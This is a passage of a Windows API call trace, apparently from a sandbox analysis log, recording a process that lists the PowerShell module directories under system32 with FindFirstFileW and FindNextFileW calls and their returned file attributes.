ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0182.395] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0182.395] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0182.396] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0182.396] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0182.396] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0182.396] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0182.397] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0182.397] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0182.397] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0182.397] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0182.397] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0182.398] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0182.398] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0182.398] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0182.398] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0182.398] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0182.399] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0182.399] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0182.399] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0182.399] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0182.399] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0182.400] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0182.400] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0182.400] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0182.400] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.400] FindClose (in: hFindFile=0x1a9b6b40 | out: hFindFile=0x1a9b6b40) returned 1 [0182.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc10) returned 1 [0182.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddbd0) returned 1 [0182.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddcc0) returned 1 [0182.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0182.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7dd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0182.401] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x1b7dd960 | out: lpFindFileData=0x1b7dd960*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b69c0 [0182.401] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.402] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0182.402] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0182.402] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0182.402] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0182.403] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0182.403] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0182.403] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0182.404] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0182.404] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0182.404] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0182.405] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0182.405] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0182.405] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0182.405] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0182.405] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0182.406] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0182.406] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, 